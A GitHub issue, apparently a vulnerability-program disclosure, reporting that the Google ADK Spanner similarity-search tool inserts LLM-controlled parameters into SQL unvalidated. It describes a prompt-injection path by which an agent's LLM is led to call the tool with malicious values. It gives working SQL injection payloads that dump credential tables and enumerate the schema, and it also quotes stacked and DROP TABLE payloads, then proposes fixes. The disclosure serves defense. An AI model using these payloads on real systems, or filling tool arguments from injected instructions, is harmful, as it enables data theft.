Spanner search tool: validate structural SQL identifiers (defense-in-depth for prompt-injection-driven SQLi)


## Summary

`google.adk.tools.spanner.search_tool` interpolates several LLM-controllable
parameters into SQL via f-strings without validation:

- `table_name`, `columns`, `embedding_column_to_search`, `additional_filter`,
  `top_k` in `_generate_sql_for_knn` / `_generate_sql_for_ann`
- `spanner_googlesql_embedding_model_name` in `_generate_googlesql_for_embedding_query`
- `vertex_ai_embedding_model_endpoint` (inside `'...'`) in
  `_generate_postgresql_for_embedding_query`

These are not standard untrusted-input SQLi (Spanner's `execute_sql` is
single-statement; stacked queries fail at parse), but `similarity_search` is
registered as a `GoogleTool` in `SpannerToolset.get_tools()` (spanner_toolset.py:122),
so the LLM populates these parameters at runtime. A successful prompt injection
on the agent's input can lead the LLM to call the tool with malicious values,
enabling single-statement primitives like UNION-based read exfiltration and
INFORMATION_SCHEMA enumeration against any table the service account can SELECT.

## Threat model

```
prompt-injected user message
        │
        ▼
LLM populates similarity_search(table_name=..., columns=..., additional_filter=..., ...)
        │
        ▼
_generate_sql_for_knn renders the values into an f-string SQL template
        │
        ▼
snapshot.execute_sql(sql, params={embedding: ...})  -- structural identifiers unbound
```

The `query` parameter is correctly bound (`@query` / `$1`), but every structural
identifier above flows in unvalidated.

## Reproduction (single-statement primitives that work)

Each example below shows the LLM-emitted tool-call arguments and the resulting
SQL rendered by `_generate_sql_for_knn`. All three parse as a single Spanner
GoogleSQL statement and exercise the documented surface of `similarity_search`.

### 1. UNION-based exfiltration via `additional_filter`

```python
from google.adk.tools.spanner import search_tool
from google.cloud.spanner_admin_database_v1.types import DatabaseDialect

sql = search_tool._generate_sql_for_knn(
    dialect=DatabaseDialect.GOOGLE_STANDARD_SQL,
    table_name="documents",
    embedding_column_to_search="embedding",
    columns=["content"],
    additional_filter="1=1 UNION ALL SELECT password, 0.0 FROM admin_credentials",
    distance_type="COSINE",
    top_k=10,
)
```

Rendered SQL:

```sql
SELECT content, COSINE_DISTANCE(embedding, @embedding) AS distance
FROM documents
WHERE 1=1 UNION ALL SELECT password, 0.0 FROM admin_credentials
ORDER BY distance
LIMIT 10
```

`UNION ALL` operates at the SELECT-statement level; column counts match (2 on
each side); `ORDER BY distance` binds to the combined result. Any table the
service account can SELECT becomes readable through the search result rows.

### 2. INFORMATION_SCHEMA enumeration via `columns`

```python
sql = search_tool._generate_sql_for_knn(
    dialect=DatabaseDialect.GOOGLE_STANDARD_SQL,
    table_name="documents",
    embedding_column_to_search="embedding",
    columns=[
        "(SELECT STRING_AGG(table_name, ',') FROM INFORMATION_SCHEMA.TABLES) AS schema_dump",
        "content",
    ],
    additional_filter=None,
    distance_type="COSINE",
    top_k=1,
)
```

Rendered SQL:

```sql
SELECT (SELECT STRING_AGG(table_name, ',') FROM INFORMATION_SCHEMA.TABLES) AS schema_dump,
       content,
       COSINE_DISTANCE(embedding, @embedding) AS distance
FROM documents
WHERE 1=1
ORDER BY distance
LIMIT 1
```

A scalar subquery in the SELECT list is valid GoogleSQL. The attacker gets the
full table inventory of the database the agent's SA can see, which makes
follow-up primitive 1 trivially weaponizable across the whole instance.

### 3. Cross-table read via `table_name`

```python
sql = search_tool._generate_sql_for_knn(
    dialect=DatabaseDialect.GOOGLE_STANDARD_SQL,
    table_name="documents JOIN admin_credentials ac ON TRUE",
    embedding_column_to_search="embedding",
    columns=["ac.password", "ac.username"],
    additional_filter=None,
    distance_type="COSINE",
    top_k=50,
)
```

Rendered SQL:

```sql
SELECT ac.password, ac.username, COSINE_DISTANCE(embedding, @embedding) AS distance
FROM documents JOIN admin_credentials ac ON TRUE
WHERE 1=1
ORDER BY distance
LIMIT 50
```

A cross-join multiplies `documents` rows with every row of `admin_credentials`,
projecting credentials into the search result regardless of vector similarity.
Works against any pair of tables the service account can SELECT.

## What does *not* work (so reviewers don't have to check)

Stacked queries (`;`-separated statements) are rejected by Spanner's
`execute_sql` at parse time, so payloads like `LIMIT 10; SELECT * FROM secrets`,
`...; DROP TABLE users`, or `MODEL m); SELECT ... FROM INFORMATION_SCHEMA.TABLES`
do not execute. DDL via `execute_sql` is also blocked — DDL goes through
`Database.update_ddl`. The realistic blast radius is bounded to read primitives
against tables the agent's SA can already SELECT.

## Proposed fix

- Regex-validate identifiers (table, columns, embedding column, GSQL model name)
- Regex-validate the Vertex AI endpoint format used in the PG literal
- Reject `;`, `--`, `/*`, `*/` in `additional_filter` and document it as a
  developer-trusted field rather than LLM-controllable
- Enforce `int` on `top_k` inside `similarity_search` (the dict path; the
  pydantic `SpannerVectorStoreSettings` path is already type-safe)

Discovered via OSS VRP, bug ID [redact if needed]. Happy to send a PR.
````

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Spanner search tool: validate structural SQL identifiers (defense-in-depth for prompt-injection-driven SQLi) #5913

Summary

Threat model

Reproduction (single-statement primitives that work)

1. UNION-based exfiltration via `additional_filter`

2. INFORMATION_SCHEMA enumeration via `columns`

3. Cross-table read via `table_name`

What does not work (so reviewers don't have to check)

Proposed fix

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Spanner search tool: validate structural SQL identifiers (defense-in-depth for prompt-injection-driven SQLi) #5913

Description

Summary

Threat model

Reproduction (single-statement primitives that work)

1. UNION-based exfiltration via additional_filter

2. INFORMATION_SCHEMA enumeration via columns

3. Cross-table read via table_name

What does not work (so reviewers don't have to check)

Proposed fix

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions

1. UNION-based exfiltration via `additional_filter`

2. INFORMATION_SCHEMA enumeration via `columns`

3. Cross-table read via `table_name`